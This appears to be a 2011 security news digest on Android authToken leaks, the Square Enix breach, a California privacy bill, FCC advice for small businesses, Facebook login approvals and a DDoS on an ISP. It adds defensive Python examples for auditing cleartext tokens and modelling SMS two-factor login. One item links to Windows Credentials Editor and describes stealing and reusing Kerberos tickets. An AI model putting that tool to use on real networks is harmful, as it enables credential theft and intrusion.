The researchers also suggested Google improve its security by shortening the length of time authTokens are valid and rejecting ClientLogin requests from insecure http connections. With more than 99 percent of carriers offering their users Android versions with known security weaknesses, the report demonstrates how little success Google has had in getting its partners to upgrade to the latest versions. Many Verizon Wireless customers, for instance, remain stuck with Android 2.2.2, despite containing vulnerabilities that have been known about for months.

Last week, Google said it planned to work more closely with wireless carriers in an attempt to help them offer Android updates more quickly. The company has yet to offer details. A Verizon spokeswoman told The Register she couldn't say when the company will provide customers with an updated version of Android. She said users should consider using their devices only on secured networks.
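The two fixes the researchers ask for, ClientLogin only over https and shorter-lived authTokens, are easy to check for in an app's own outbound traffic. An added example, not from the Register article or from the Ulm paper: it audits a constructed log of outbound requests for ClientLogin headers sent over plain http or carried past an assumed one-day age limit, and shows the server-side rule of refusing such requests over http. The request URLs, timestamps and token values are placeholders constructed for the example; the `GoogleLogin auth=` header form is the one ClientLogin used:

```python
from datetime import datetime, timedelta
from typing import Dict, List, Tuple
from urllib.parse import urlsplit

# Authorization header form used by Google's ClientLogin API.
CLIENTLOGIN_PREFIX = "GoogleLogin auth="
# Policy this audit enforces (assumption: far tighter than the 14-day
# lifetime the article describes).
MAX_TOKEN_AGE = timedelta(days=1)

# Constructed outbound requests, as an app or a debugging proxy might log
# them. Token values are placeholders, not real credentials.
OBSERVED: List[dict] = [
    {"url": "http://www.google.com/calendar/feeds/default/private/full",
     "headers": {"Authorization": "GoogleLogin auth=PLACEHOLDER_TOKEN_A"},
     "token_issued": datetime(2011, 5, 1), "sent": datetime(2011, 5, 2)},
    {"url": "https://www.google.com/m8/feeds/contacts/default/full",
     "headers": {"Authorization": "GoogleLogin auth=PLACEHOLDER_TOKEN_B"},
     "token_issued": datetime(2011, 5, 1), "sent": datetime(2011, 5, 1, 6)},
    {"url": "http://picasaweb.google.com/data/feed/api/user/default",
     "headers": {"Authorization": "GoogleLogin auth=PLACEHOLDER_TOKEN_C"},
     "token_issued": datetime(2011, 4, 20), "sent": datetime(2011, 5, 2)},
    {"url": "http://example.com/public/feed", "headers": {},
     "token_issued": None, "sent": datetime(2011, 5, 2)},
]


def audit_clientlogin(requests: List[dict],
                      max_age: timedelta = MAX_TOKEN_AGE) -> List[Tuple[str, str]]:
    """Return (url, finding) pairs for every ClientLogin request that
    travelled in cleartext or reused a token older than max_age."""
    findings = []
    for req in requests:
        auth = req["headers"].get("Authorization", "")
        if not auth.startswith(CLIENTLOGIN_PREFIX):
            continue  # not a ClientLogin-authenticated request
        if urlsplit(req["url"]).scheme.lower() != "https":
            findings.append((req["url"], "authToken sent in cleartext"))
        issued = req["token_issued"]
        if issued is not None and req["sent"] - issued > max_age:
            findings.append((req["url"], "authToken older than policy"))
    return findings


def server_accepts(url: str, headers: Dict[str, str]) -> bool:
    """Server-side rule the researchers suggested: refuse ClientLogin over http."""
    auth = headers.get("Authorization", "")
    return not (auth.startswith(CLIENTLOGIN_PREFIX)
                and urlsplit(url).scheme.lower() != "https")
```

Running the audit on the constructed log produces three findings: the Calendar and Picasa requests both go out in cleartext, and the Picasa token is twelve days old. The same check belongs in a client's HTTP layer before the request is sent, not only in a log review afterwards.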

Source: http://www.bangkokpost.com/tech/computer/237244/square-enix-customer-data-leaked-after-sony-problems

Japanese game developer Square Enix Holdings said email addresses of 25,000 customers as well as resumes of 250 job applicants were leaked after a hacker attack against its European subsidiary.

Hackers accessed the Eidosmontreal.com website, managed by London-based Square Enix Ltd, as well as other product sites, said a statement from the group released late Saturday.

The news came as Sony's game and Internet services were pulled down after hackers staged one of the biggest data breaches since the advent of the Internet, including the theft of personal customer data.

Square Enix Holdings, creator of mega hits such as Final Fantasy and the Dragon Quest series, took the sites offline to increase security, before resuming services.

Tools:  http://www.ampliasecurity.com/research/wce_v1_2.tgz

WCE (Windows Credentials Editor) has been updated to version 1.2.  The new update allows you to steal Kerberos tickets from a Windows box, and then inject those same tickets into another Windows box or Unix box. You can use these tickets to access other systems.

This is the equivalent of NTLM pass-the-hash but for Kerberos.

Source: http://networkeffect.allthingsd.com/20110516/proposed-law-would-require-social-networks-to-be-private-by-default/

A proposed California law could significantly change the way social networks operate by forcing them to step up their privacy settings.

Facebook and other Internet companies oppose the proposal, which was put forward by California Senate Majority Leader Ellen Corbett (D-San Leandro) and last week made it out of committee.

The proposed law, SB 242, would require social networks to do the following for California users:

– Establish default settings that prohibit the public or private display of anything other than a user’s name and city without their consent.
– Require new users to pick privacy settings during the registration process.
– Write their privacy options “in plain language” and display them in an “easy-to-use format.”
– Remove personally identifying information, including photos, within 48 hours of a user’s request.
– Pay up to $10,000 each time they fail to do any of this.

A previous version of the bill applied to children under 18, but a revision earlier this month made it much broader. It was approved by the Senate Judiciary Committee last week. Corbett’s pitch is this: “You shouldn’t have to sign in and give up your personal information before you get to the part where you say, ‘Please don’t share my personal information.’”

Facebook and other Internet companies don’t like the bill, and industry groups such as the Internet Alliance and NetChoice have spoken out against it. They argue that such tightened privacy restrictions and regulatory oversight could hamstring social networks’ ability to provide valuable and safe experiences to users.

For instance, if the default settings are all private, it could be hard for new members to get value out of the sites because they won’t be found by other users. Other opponents argue that this should be a national issue, not a state one.

Facebook spokesman Andrew Noyes gave this statement to the San Francisco Chronicle:

“Any legislative or regulatory proposal must honor users’ expectations in the contexts in which they use online services and promote the innovation that fuels the growth of the Internet economy. This legislation is a serious threat both to Facebook’s business in California and to meaningful California consumers’ choices about use of personal data.”

Majority Leader Corbett is further accusing Facebook of secretly lobbying against the bill without disclosing its identity. (Sound familiar?) We’ve asked Noyes for clarification on this issue.

Update: Noyes replied: “We’re confused by the claim raised in the SF Chron story that Facebook is involved in some kind of “stealth” campaign to kill SB 242 when, as the article acknowledges, we met face-to-face with the bill’s author and every other member of the Senate Judiciary Committee to express our concerns.”

Source: http://thehill.com/blogs/hillicon-valley/technology/161401-fcc-shifts-cybersecurity-focus-to-small-businesses

Small businesses must do more to safeguard their networks, intellectual property and customers' personal data, according to experts at the Federal Communications Commission's Monday roundtable on cybersecurity.

FCC Chairman Julius Genachowski convened the roundtable to discuss the importance of small and medium-sized businesses protecting their computer systems from hackers and outside attacks in the light of several high-profile data breaches in recent weeks at major technology firms.

Breaches at the digital marketing firm Epsilon and two gaming networks owned by Sony have helped cybersecurity return to the headlines, even as the White House released its first legislative guidance on the issue last week.

Speaking with The Hill after the event, Genachowski said that while the challenges facing small firms online are very real, the FCC has outlined a series of easy steps they can take to minimize their risk.

"It's readily available, low-hanging fruit when it comes to cybersecurity planning for the country," Genachowski said, pointing out that half of small businesses don't currently have network security plans in place.

"It's about taking the best practices, basic ideas that are widely accepted and making sure that they're communicated to small businesses."

Genachowski pointed to a recent study by the security firm Symantec that found almost three-fourths of small and medium-sized businesses reported suffering a cyber-attack in the past year, resulting in billions of dollars in lost revenue. He said the average attack costs a firm almost $200,000.

"Small businesses also often struggle to protect the confidential data of their customers. 42 percent of small and medium businesses surveyed reported the loss of confidential or private data in the past 12 months and 40 percent experienced direct financial costs as a result," Genachowski said, "and almost half of small businesses don’t back up their data."

Maurice Jones, chief executive officer of the Washington-area Parkinson Construction Co., described how his firm was compromised by a phishing attack that obtained login and password information for its bank accounts.

Jones said his firm later realized it was missing a significant amount of money from its accounts. By working with banks, Jones said his company was able to recoup some of the lost funds, but not all.

Still, he maintained that broadband access to the Web is vital for the company to remain competitive, since it cuts the number of administrative employees needed by almost half.

Former Secretary of Homeland Security Michael Chertoff said that while it is crucial to manage the amount of risk from cyber-attacks, no plan will completely eliminate the risk of an intrusion.

Chertoff said the only way to do that would be to abandon the network and the benefits it provides. Instead, he said small firms must strike a "realistic balance" depending on their individual concerns.

The commission released a tipsheet on Monday aimed at helping small businesses identify 10 easy steps they can take to reduce the risk of an attack. The steps include training employees in security principles, downloading and installing software updates, installing a firewall for Web connections and limiting the amount of physical and administrative access that employees have to the firm's computers.

Phyllis Schneck, public center chief technology officer for the security firm McAfee, highlighted securing physical access to network infrastructure as crucial, as some of the largest data breaches have been caused by USB flash drives containing malware. She also emphasized the importance of making users regularly change their network passwords.

Another White House announcement on an international plan of cooperation on cybersecurity issues is expected Monday afternoon. Genachowski said he will be participating, but declined to elaborate on details of the event.

Source: http://www.securitymanagement.com/news/facebook-adds-new-security-measures-008552

Facebook announced several security enhancements last week including a new two-factor authentication system and a partnership with a service that can help users avoid clicking on risky or malicious links.

With the optional new Login Approvals service, users will be required to enter an additional code, sent to them via text message, when logging in from a new or unrecognized computer or device. Once the code is entered, users then have the option to save the device to their account so that it no longer requires additional authentication, according to a Facebook blog announcing the new measures.

Users will also see when attempts have been made to access their account from an unrecognized device, but no code was entered, according to the post. If users don’t recognize the login attempt, they’ll be able to change their password “with the knowledge that while someone else may have known [the] login credentials, he or she was unable to access your account.” Login Approvals can be enabled through the “Account Security” section of the account settings page, according to the post.

One aim of the new service was to balance security and usability, according to a separate Facebook blog post. Two-factor authentication sometimes requires users to download applications or to purchase physical tokens, it states. “These are good approaches, and we're considering incorporating them in the future, but they require a lot from the user before being able to turn on the feature. To have the biggest impact and provide this added security to the most people, we decided on SMS.”

Facebook also announced a partnership with Web of Trust (WOT), which ranks Web sites based on feedback provided by WOT community members. The tool, which contains rankings of millions of sites, can help reduce the risk of phishing, spam, scams, and other threats, according to the Facebook post announcing the security enhancements.

Facebook already has a system that automatically scans links to determine whether the Web sites associated with the links are “spammy” or contain malware, according to the post. In the coming months, the company will “increase [its] coverage even more by working with other industry leaders.”
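The Login Approvals flow described above has three moving parts: a code demanded only from unrecognised devices, the option to remember a device once the code is accepted, and a list of password-correct attempts where no code was ever entered, which is the owner's cue to change the password. An added example modelling that flow, not Facebook's code: the device identifier, the five-minute code lifetime and the three-attempt limit are assumptions, and the `outbox` list stands in for an SMS gateway.

```python
import hmac
import secrets
from typing import Dict, List, Set, Tuple

CODE_TTL_SECONDS = 5 * 60   # assumed: a code is valid for five minutes
MAX_CODE_ATTEMPTS = 3       # assumed: three wrong codes void the pending login


class LoginApprovals:
    """Second factor by SMS for logins from devices the account has not seen.

    Constructed model; 'device_id' stands for whatever cookie or token the
    site uses to recognise a browser (assumption)."""

    def __init__(self) -> None:
        self.trusted: Dict[str, Set[str]] = {}           # user -> remembered device ids
        self.pending: Dict[Tuple[str, str], dict] = {}   # (user, device) -> code state
        self.unverified: List[dict] = []                 # attempts that never entered a code
        self.outbox: List[Tuple[str, str]] = []          # (user, code): stand-in for the SMS gateway

    def login(self, user: str, device_id: str, password_ok: bool, now: float) -> str:
        if not password_ok:
            return "denied"
        if device_id in self.trusted.get(user, set()):
            return "ok"  # recognised device: no second factor
        code = f"{secrets.randbelow(10**6):06d}"  # six digits from the OS CSPRNG
        self.pending[(user, device_id)] = {
            "code": code, "expires": now + CODE_TTL_SECONDS, "attempts": 0,
        }
        # Recorded until a code is entered: the owner will see this attempt.
        self.unverified.append({"user": user, "device": device_id, "at": now})
        self.outbox.append((user, code))
        return "code_required"

    def verify(self, user: str, device_id: str, code: str, remember: bool, now: float) -> bool:
        key = (user, device_id)
        state = self.pending.get(key)
        if state is None or now > state["expires"]:
            self.pending.pop(key, None)
            return False
        state["attempts"] += 1
        if not hmac.compare_digest(state["code"], code):
            if state["attempts"] >= MAX_CODE_ATTEMPTS:
                del self.pending[key]  # force a fresh password login and a new code
            return False
        del self.pending[key]
        self.unverified = [a for a in self.unverified
                           if not (a["user"] == user and a["device"] == device_id)]
        if remember:
            self.trusted.setdefault(user, set()).add(device_id)
        return True

    def unrecognized_attempts(self, user: str) -> List[dict]:
        """What the account owner is shown: logins where the password was
        right but no code was entered."""
        return [a for a in self.unverified if a["user"] == user]
```

Note that a wrong password never triggers an SMS, so the code channel cannot be used to confirm whether a password is correct, and that an attempt stays on the owner's list until its code is accepted, which is exactly the signal the post describes.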

Source: http://www.timescolonist.com/Internet+attack+files+sent+RCMP/4784705/story.html

Details of the cyberattack that choked thousands of websites hosted by Islandnet.com are now in the hands of the RCMP.

Mark Morley, who owns Islandnet.com with brother Steve Morley, said Friday he has reported the attack to West Shore RCMP.

An email Thursday afternoon to the Internet service provider claimed responsibility for the attack, demanding that a particular website be taken down. That website was removed and the sender followed up with another email stating the attacks had ceased.

The RCMP have opened a case file and are referring the matter to their own technical specialists, Mark Morley said.